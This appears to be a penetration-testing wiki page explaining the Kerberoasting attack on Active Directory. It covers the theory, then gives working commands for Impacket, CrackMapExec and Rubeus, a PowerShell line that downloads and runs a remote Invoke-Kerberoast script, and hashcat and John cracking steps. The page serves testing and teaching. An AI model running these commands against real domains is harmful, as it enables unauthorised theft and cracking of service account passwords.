Kerberoast

MITRE ATT&CK™ Sub-technique T1558.003

Theory

When asking the KDC (Key Distribution Center) for a Service Ticket, a.k.a. TGS (Ticket Granting Service), the requesting user needs to send a valid TGT (Ticket Granting Ticket) and the SPN (Service Principal Name) of the service wanted. If the TGT is valid, and if the SPN exists, the KDC sends the TGS to the requesting user.

The TGS is encrypted with the requested service account's NT hash. If an attacker has a valid TGT and knows a SPN for a service, he can request a TGS for this service and crack it offline later in an attempt to retrieve that service account's password.

In most situations, services accounts are machine accounts, which have very complex, long, and random passwords. But if a service account, with a human-defined password, has a SPN set, attackers can request a TGS for this service and attempt to crack it offline. This is Kerberoasting.

Practice

Unlike ASREProasting, this attack can only be carried out with a prior foothold (valid domain credentials).

UNIX-like
Windows
UNIX-like

The Impacket script GetUserSPNs (Python) can perform all the necessary steps to request a TGS for a service given its SPN and valid domain credentials.

# with a password
GetUserSPNs.py -outputfile kerberoastables.txt -dc-ip $KeyDistributionCenter 'DOMAIN/USER:Password'
​
# with an NT hash
GetUserSPNs.py -outputfile kerberoastables.txt -hashes 'LMhash:NThash' -dc-ip $KeyDistributionCenter 'DOMAIN/USER'

This can also be achieved with CrackMapExec (Python).

crackmapexec ldap $TARGETS -u $USER -p $PASSWORD --kerberoasting kerberoastables.txt --kdcHost $KeyDistributionCenter
Windows

The same thing can be done with Rubeus from a session running with a domain user privileges.

Rubeus.exe kerberoast /outfile:kerberoastables.txt

This can also be achieved with Powershell. Depending on the tool that the tester will use to attempt cracking the ???, the -OutputFormat can be set to hashcat or john.

iex (new-object Net.WebClient).DownloadString("https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1")
Invoke-Kerberoast -OutputFormat hashcat | % { $_.Hash } | Out-File -Encoding ASCII kerberoastables.txt

​Hashcat and JohnTheRipper can then be used to try cracking the hash.

hashcat -m 13100 kerberoastables.txt $wordlist
john --format=krb5tgs --wordlist=$wordlist kerberoastables.txt

Targeted Kerberoasting

If an attacker controls an account with the rights to add an SPN to another (GenericAll, GenericWrite), it can be abused to make that other account vulnerable to Kerberoast (see exploitation).

Resources